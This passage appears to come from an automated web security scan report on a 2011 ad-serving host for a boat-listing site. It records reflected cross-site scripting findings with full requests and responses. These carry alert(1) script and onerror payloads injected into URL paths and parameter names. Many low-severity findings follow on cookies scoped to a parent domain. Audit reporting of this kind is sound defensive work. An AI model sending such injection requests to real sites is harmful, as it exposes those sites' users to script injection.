This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1929ec"><img%20src%3da%20onerror%3dalert(1)>37c23b40443/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:41 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXkrU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2338
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<script type="text/javascript">
function pr_swfver(){
var osf,osfd,i,axo=1,v=0,nv=navigator;
if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf.
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1507270971/Top1929ec"><img src=a onerror=alert(1)>37c23b40443/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.72. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e654"><script>alert(1)</script>1bd06245ba1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?3e654"><script>alert(1)</script>1bd06245ba1=1 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:38 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXkoU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2291
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<script type="text/javascript">
function pr_swfver(){
var osf,osfd,i,axo=1,v=0,nv=navigator;
if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf.
...[SNIP]...
m_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1022856635/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?_RM_EMPTY_&3e654"><script>alert(1)</script>1bd06245ba1=1" WIDTH=2 HEIGHT=2>

2. Cookie scoped to parent domain  previous  next
There are 23 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


2.1. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c?&man=32REGULATOR&type=used&cl=PowerCenterConsole&cl=PowerSaltwaterFishing&minyr=2006&maxyr=2006&minpr=108000&maxpr=108000&minl=32&maxl=32&hull=Fiberglass&fuel=GasPetrol HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXNxU10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:20:02 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXNyU10erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Type: image/jpeg
Content-Length: 23704

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................Z....
...[SNIP]...

2.2. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c?&man=REGULATOR&type=used&cl=PowerSportFishing&cl=PowerSaltwaterFishing&cl=PowerCenterConsole&minyr=2006&maxyr=2006&minpr=119000&maxpr=119000&minl=32&maxl=32&hull=Fiberglass&fuel=GasPetrol HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXQBU20erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:22:20 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXQCU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Type: image/jpeg
Content-Length: 23704

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................Z....
...[SNIP]...

2.3. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c?&man=REGULATOR&type=used&cl=PowerCenterConsole&cl=PowerSaltwaterFishing&minyr=2005&maxyr=2005&minpr=112995&maxpr=112995&minl=32&maxl=32&hull=Fiberglass&fuel=GasPetrol HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXOBU10erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:20:16 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXOCU20erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Type: image/jpeg
Content-Length: 23704

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................Z....
...[SNIP]...

2.4. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?_RM_EMPTY_&&man=regulator&type=used&minyr=2004&minpr=0&minl=24&maxl=32 HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:19:12 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXNAU10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

2.5. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1248084167@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1248084167@Top1,Right1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1248084167@Top1,Right1?&man=REGULATOR&type=used&cl=PowerSportFishing&cl=PowerSaltwaterFishing&cl=PowerCenterConsole&minyr=2006&maxyr=2006&minpr=119000&maxpr=119000&minl=32&maxl=32&hull=Fiberglass&fuel=GasPetrol HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXO0U10erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:20:11 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXO7U10erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1531
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/65822190
...[SNIP]...

2.6. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1304883875@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1304883875@Top1,Right1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1304883875@Top1,Right1?&man=REGULATOR&type=used&cl=PowerCenterConsole&cl=PowerSaltwaterFishing&minyr=2005&maxyr=2005&minpr=112995&maxpr=112995&minl=32&maxl=32&hull=Fiberglass&fuel=GasPetrol HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXO7U10erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:20:15 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXOBU10erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1451
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/11664150
...[SNIP]...

2.7. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1401531553@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1401531553@Top1,Right1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1401531553@Top1,Right1?&man=REGULATOR&type=used&cl=PowerSportFishing&cl=PowerSaltwaterFishing&cl=PowerCenterConsole&minyr=2007&maxyr=2007&minpr=119900&maxpr=119900&minl=32&maxl=32&hull=Fiberglass&fuel=GasPetrol HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXNyU10erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:20:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXO0U10erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1523
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/40685903
...[SNIP]...

2.8. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1590611172@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1590611172@Top1,Right1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1590611172@Top1,Right1?&man=32REGULATOR&type=used&cl=PowerCenterConsole&cl=PowerSaltwaterFishing&minyr=2006&maxyr=2006&minpr=108000&maxpr=108000&minl=32&maxl=32&hull=Fiberglass&fuel=GasPetrol HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXNAU10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:20:01 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXNxU10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1455
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/13069722
...[SNIP]...

2.9. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1984270322@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1984270322@Top1,Right1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1984270322@Top1,Right1?&man=REGULATOR&type=used&cl=PowerSportFishing&cl=PowerSaltwaterFishing&cl=PowerCenterConsole&minyr=2006&maxyr=2006&minpr=119000&maxpr=119000&minl=32&maxl=32&hull=Fiberglass&fuel=GasPetrol HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXOJU20erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:22:19 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXQBU20erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1491
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/18136210
...[SNIP]...

2.10. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1209188999@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1209188999@Top1,Right1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1209188999@Top1,Right1?&man=regulator&type=used&minyr=2004&minpr=0&minl=24&maxl=32 HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&currencyid=100&cit=true&toLength=32&luom=126&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range&No=10
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXOCU20erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:20:23 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXOJU20erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1255
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/104044
...[SNIP]...

2.11. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1673595005@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1673595005@Top1,Right1

Issue detail

